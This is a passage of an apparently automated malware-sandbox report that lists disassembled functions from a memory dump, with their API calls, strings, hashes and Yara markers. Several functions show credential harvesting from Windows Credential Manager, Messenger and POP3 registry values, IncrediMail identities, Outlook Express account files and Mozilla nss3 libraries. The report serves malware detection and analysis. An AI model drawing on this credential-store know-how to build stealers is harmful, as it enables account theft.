                                                                                                      • Part of subcall function 0040B372: GetSubMenu.USER32(?,00000000), ref: 0040B38D
                                                                                                      • Part of subcall function 0040B372: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B3BA
                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040B63A
                                                                                                    • SetCursor.USER32(00000000), ref: 0040B641
                                                                                                    • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040B663
                                                                                                    • SetFocus.USER32(?), ref: 0040B69E
                                                                                                    • SetFocus.USER32(?), ref: 0040B6EF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                    • String ID:
                                                                                                    • API String ID: 1416211542-0
                                                                                                    • Opcode ID: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                                                                    • Instruction ID: 8f05fcf81e8b57b2917fe7890bba9475612e1218cdf4c3fdd04c744704700eb5
                                                                                                    • Opcode Fuzzy Hash: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                                                                    • Instruction Fuzzy Hash: E741A271100605EFCB119F64CD89EEE7775FB08300F104936E615A62A1CB799D91DBDE
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00405FC6, Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EmptyClipboard.USER32 ref: 00405FD0
                                                                                                      • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00405FED
                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00405FFE
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0040600B
                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040601E
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040602D
                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00406036
                                                                                                    • GetLastError.KERNEL32 ref: 0040603E
                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040604A
                                                                                                    • GetLastError.KERNEL32 ref: 00406055
                                                                                                    • CloseClipboard.USER32 ref: 0040605E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3604893535-0
                                                                                                    • Opcode ID: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
                                                                                                    • Instruction ID: 732aa9399b2cd23c9d945101f46e029b0eae2bee8c87a14991e63b5ea8a72c25
                                                                                                    • Opcode Fuzzy Hash: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
                                                                                                    • Instruction Fuzzy Hash: 6A113371900205FBDB109BB4DE4DBDE7F78EB08351F118176F606E1190DBB48A20DB69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040EDDB, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • strcpy.MSVCRT(?,Common Programs,0040EEF9,?,?,?,?,?,00000104), ref: 0040EE4E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: strcpy
                                                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                    • API String ID: 3177657795-318151290
                                                                                                    • Opcode ID: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                                                                    • Instruction ID: 838bbb5fcb7671a25bd4d31fd75230584a1d4f3c41bb848f6a939ae912ddcdf8
                                                                                                    • Opcode Fuzzy Hash: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
                                                                                                    • Instruction Fuzzy Hash: 66F0BDB32A878EF0D429496BCD4AEB744429151B46B7C4D37A002B46D5E87D8AF260DF
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040765B, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 152COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,7661E520), ref: 00404654
                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                                    • wcslen.MSVCRT ref: 004076C5
                                                                                                    • wcsncmp.MSVCRT(?,?,?), ref: 00407709
                                                                                                    • memset.MSVCRT ref: 0040779D
                                                                                                    • memcpy.MSVCRT ref: 004077C1
                                                                                                    • wcschr.MSVCRT ref: 00407815
                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040783F
                                                                                                      • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$FreeLibrary$LoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                    • String ID: J$Microsoft_WinInet$hyA
                                                                                                    • API String ID: 2413121283-319027496
                                                                                                    • Opcode ID: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                                                                    • Instruction ID: ab6451454baefbc6762688e22d5ebab6c31fbbbf8d38218599acfc9a6d4ef790
                                                                                                    • Opcode Fuzzy Hash: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
                                                                                                    • Instruction Fuzzy Hash: 2751E4B1908345AFC710EF65C88495AB7E8FF89304F00492EFA99D3250E778E955CB57
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00402FC2, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040EB3F: RegOpenKeyExA.ADVAPI32(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                    • memset.MSVCRT ref: 00403005
                                                                                                      • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                                    • memset.MSVCRT ref: 00403052
                                                                                                    • sprintf.MSVCRT ref: 0040306A
                                                                                                    • memset.MSVCRT ref: 0040309B
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004030E3
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040310C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$Close$EnumOpensprintf
                                                                                                    • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                    • API String ID: 3672803090-3168940695
                                                                                                    • Opcode ID: 77f1cb9c152b2032cda28d200907d961ffd616d5294aac16177cd31e7d127652
                                                                                                    • Instruction ID: 2ec2bfd25db4f87ede08292043277b4916c0dadc31aa5cf960337fea200e46ca
                                                                                                    • Opcode Fuzzy Hash: 77f1cb9c152b2032cda28d200907d961ffd616d5294aac16177cd31e7d127652
                                                                                                    • Instruction Fuzzy Hash: D6314EB290021CBADB11EB95CC81EEEBB7CAF14344F0041B6B909A1051E7799F948F64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407A64, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Itemmemset$CountInfoModifystrcatstrchr
                                                                                                    • String ID: 0$6
                                                                                                    • API String ID: 1757351179-3849865405
                                                                                                    • Opcode ID: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                                                                    • Instruction ID: 1677788af10e21d8d50b2ad3b046da146c202dfcbfc60db105475917acddfa9f
                                                                                                    • Opcode Fuzzy Hash: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                                                                    • Instruction Fuzzy Hash: 1A316D71808385AFD7109F55D84099BBBF9EB84358F14883FFA9492250D378EA44CF6B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E988, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                                                                    • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9B9
                                                                                                    • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                                                                    • memcpy.MSVCRT ref: 0040EA04
                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                                                                    Strings
                                                                                                    • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9A0
                                                                                                    • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040E9C1
                                                                                                    • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9AD
                                                                                                    • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040E9B4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                    • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                    • API String ID: 1640410171-2022683286
                                                                                                    • Opcode ID: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                                                                    • Instruction ID: a0dda8305716182b94471eb279f6daf9a8f1529c8f3e89cbb35285eb134eabf6
                                                                                                    • Opcode Fuzzy Hash: 1c07360da451655baf40f8404e5edb4d1d178eda86dac3c95faae550bb755c51
                                                                                                    • Instruction Fuzzy Hash: 3811607251412DAACB11EEA5DD40EEB37ECAB48354F044837FD12F3241F674E9248BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00404837, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(comctl32.dll,76020A60,?,00000000,?,?,?,0040B9C9,76020A60), ref: 00404856
                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,76020A60), ref: 0040487C
                                                                                                    • #17.COMCTL32(?,00000000,?,?,?,0040B9C9,76020A60), ref: 0040488A
                                                                                                    • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004048A7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                    • API String ID: 2780580303-317687271
                                                                                                    • Opcode ID: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                                                                    • Instruction ID: 848b23aeb75660b77c3c697252adc3032e5e70f3caa3a854567a53d2e3e71345
                                                                                                    • Opcode Fuzzy Hash: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                                                                    • Instruction Fuzzy Hash: 3E0126723102017FD7156BA08D48BAF7AACEB84749F008139F602E21C0EBF8C912D6AC
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004081B5, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 42stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040614B: GetFileAttributesA.KERNELBASE(?,004081BE,?,00408274,00000000,?,00000000,00000104,?), ref: 0040614F
                                                                                                    • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081CF
                                                                                                    • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,00408274,00000000,?,00000000,00000104,?), ref: 004081DF
                                                                                                    • GetPrivateProfileIntA.KERNEL32(004172C0,rtl,00000000,004171B8), ref: 004081F0
                                                                                                      • Part of subcall function 00407DC1: GetPrivateProfileStringA.KERNEL32(004172C0,?,00412466,00417308,?,004171B8), ref: 00407DDC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfilestrcpy$AttributesFileString
                                                                                                    • String ID: HsA$TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                    • API String ID: 185930432-2094606381
                                                                                                    • Opcode ID: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                                                                    • Instruction ID: cb939eedfd3a0989361dc9c28bcf1dbf68e7932df9513b818d47ffc3c6ffa7d5
                                                                                                    • Opcode Fuzzy Hash: 61c3254355be24366bef669af6bb7bd6cca1bcece2790ae3e2dc5a409b7b51f7
                                                                                                    • Instruction Fuzzy Hash: 07F0F631ED821532DB113A622C03FEA39248FA2B16F04407FBC04B72C3DA7C4A81929E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040DEA9, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(nss3.dll,76021620,?,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEB8
                                                                                                    • GetModuleHandleA.KERNEL32(sqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEC1
                                                                                                    • GetModuleHandleA.KERNEL32(mozsqlite3.dll,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DECA
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DED9
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE0
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000104,0040DFDC,?,?,?,?,?,?,?,00000000), ref: 0040DEE7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeHandleLibraryModule
                                                                                                    • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                                                                    • API String ID: 662261464-3550686275
                                                                                                    • Opcode ID: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                                                                    • Instruction ID: d16a25c46baa9326af0e84a0bffbb5276bbaca378281f61e1b061e0aef5cb77a
                                                                                                    • Opcode Fuzzy Hash: 86c3fc2903f606d4177665fb0a5e8ba99052a5cd3e374b4e3edda1da98f7fed5
                                                                                                    • Instruction Fuzzy Hash: 72E0DF62F4132D67892066F19E84DABBE5CC895AE13150033AA00F3240DDE89C058AF8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E172, Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • strchr.MSVCRT ref: 0040E18A
                                                                                                    • strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                                                                      • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069E4
                                                                                                      • Part of subcall function 004069D2: strlen.MSVCRT ref: 004069EC
                                                                                                      • Part of subcall function 004069D2: _memicmp.MSVCRT ref: 00406A0A
                                                                                                    • strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1E8
                                                                                                    • strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E1F3
                                                                                                    • memset.MSVCRT ref: 0040E1CF
                                                                                                      • Part of subcall function 00406325: GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                                                                      • Part of subcall function 00406325: strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                                                                    • memset.MSVCRT ref: 0040E217
                                                                                                    • memcpy.MSVCRT ref: 0040E232
                                                                                                    • strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E23D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                    • String ID: \systemroot
                                                                                                    • API String ID: 1680921474-1821301763
                                                                                                    • Opcode ID: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                                                                    • Instruction ID: c94fb6c7bd1247ab7199cb5b48e8c216c8115a4167fd8e2fb1b5c3c0fa66e4da
                                                                                                    • Opcode Fuzzy Hash: 5187f8535ecd07f80173756fca004a5de43faed2157158ac4ad04829d081b859
                                                                                                    • Instruction Fuzzy Hash: 7021F97554C20879E720A3635C82FEA77DC9F55348F5008AFF6CAA10C1EABC96D5862A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00405BE4, Relevance: 15.1, APIs: 10, Instructions: 63windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 00405BFB
                                                                                                    • GetWindow.USER32(?,00000005), ref: 00405C13
                                                                                                    • GetWindow.USER32(00000000), ref: 00405C16
                                                                                                      • Part of subcall function 00401657: GetWindowRect.USER32(?,?), ref: 00401666
                                                                                                      • Part of subcall function 00401657: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00401681
                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405C22
                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 00405C39
                                                                                                    • GetDlgItem.USER32(?,00000000), ref: 00405C4B
                                                                                                    • GetDlgItem.USER32(?,00000000), ref: 00405C5D
                                                                                                    • GetDlgItem.USER32(?,00000000), ref: 00405C6F
                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 00405C7D
                                                                                                    • SetFocus.USER32(00000000), ref: 00405C80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ItemWindow$Rect$ClientFocusPoints
                                                                                                    • String ID:
                                                                                                    • API String ID: 2187283481-0
                                                                                                    • Opcode ID: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                                                                    • Instruction ID: 7666b00b3ddace13e8d54cd994e266c410995bf231072ec337e33f1596805ccb
                                                                                                    • Opcode Fuzzy Hash: d2f13065a0daf7b94e2d6602c1ebad63a970ca7fe2c26cba6661fff7476f23c3
                                                                                                    • Instruction Fuzzy Hash: 1A115471500304ABDB116F25CD49E6BBFADDF41758F05843AF544AB591CB79D8028A68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401A50, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: free$strlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 667451143-3916222277
                                                                                                    • Opcode ID: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                                                                    • Instruction ID: 06eee62d74eb4b55ebb23f84067d794473d6c8b6021198aa51b9bcc42ccbae70
                                                                                                    • Opcode Fuzzy Hash: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                                                                    • Instruction Fuzzy Hash: DA6178704083859FDB249F26948046BBBF1FB85315F54997FF5D2A22A1E738E8468B0B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D4A6, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 94registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,7661E520), ref: 0040D4D5
                                                                                                    • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040D5AA
                                                                                                      • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                      • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7661E520), ref: 004047A8
                                                                                                      • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                                    • memcpy.MSVCRT ref: 0040D546
                                                                                                    • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040D558
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040D5CC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
                                                                                                    • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                                                                                    • API String ID: 3289975857-105384665
                                                                                                    • Opcode ID: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                                                                    • Instruction ID: 7f1cec63b8765f81c3836bbc11e71f1516ceea0880c28a2d93855dc55ce36bd3
                                                                                                    • Opcode Fuzzy Hash: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                                                                    • Instruction Fuzzy Hash: AE314DB1D01219AFDB11DF94CC44BDEBBB9AF48318F1040B6E905B7290D6789B94CF99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040706C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 90COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040708D
                                                                                                      • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                                                      • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                      • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7661E520), ref: 004047A8
                                                                                                      • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,!r@,?,000000FD,00000000,00000000,?,00000000,!r@,?,?,?,?,00000000), ref: 00407128
                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,7661E430,?), ref: 00407138
                                                                                                      • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                                      • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                                      • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
                                                                                                    • String ID: !r@$!r@$POP3_credentials$POP3_host$POP3_name
                                                                                                    • API String ID: 604216836-250559020
                                                                                                    • Opcode ID: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                                                                    • Instruction ID: f8ca724a3b3a12fba31c48434a973b8369f3aae8d57bdfed2f45406e53e98f37
                                                                                                    • Opcode Fuzzy Hash: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                                                                    • Instruction Fuzzy Hash: C331707194021CAFDB11EB698C81ADE7BBCEF19344F0084B6FA05A2281D6389B598F65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00405E46, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52stringlibrarywindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00405F65,?,?), ref: 00405E6B
                                                                                                    • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00405F65,?,?), ref: 00405E89
                                                                                                    • strlen.MSVCRT ref: 00405E96
                                                                                                    • strcpy.MSVCRT(?,?,?,?,00405F65,?,?), ref: 00405EA6
                                                                                                    • LocalFree.KERNEL32(?,?,?,00405F65,?,?), ref: 00405EB0
                                                                                                    • strcpy.MSVCRT(?,Unknown Error,?,?,00405F65,?,?), ref: 00405EC0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                    • API String ID: 3198317522-572158859
                                                                                                    • Opcode ID: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                                                                    • Instruction ID: 3a45a8761f4bc18c8cc8ce1e33cdf84813ecacbbbbff7bb38409c5e389e3efd7
                                                                                                    • Opcode Fuzzy Hash: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                                                                    • Instruction Fuzzy Hash: A901B131604118BAE7155B61ED46EDF7E6DDB14792B20443AF602F00A0DA785F409A98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040875C, Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
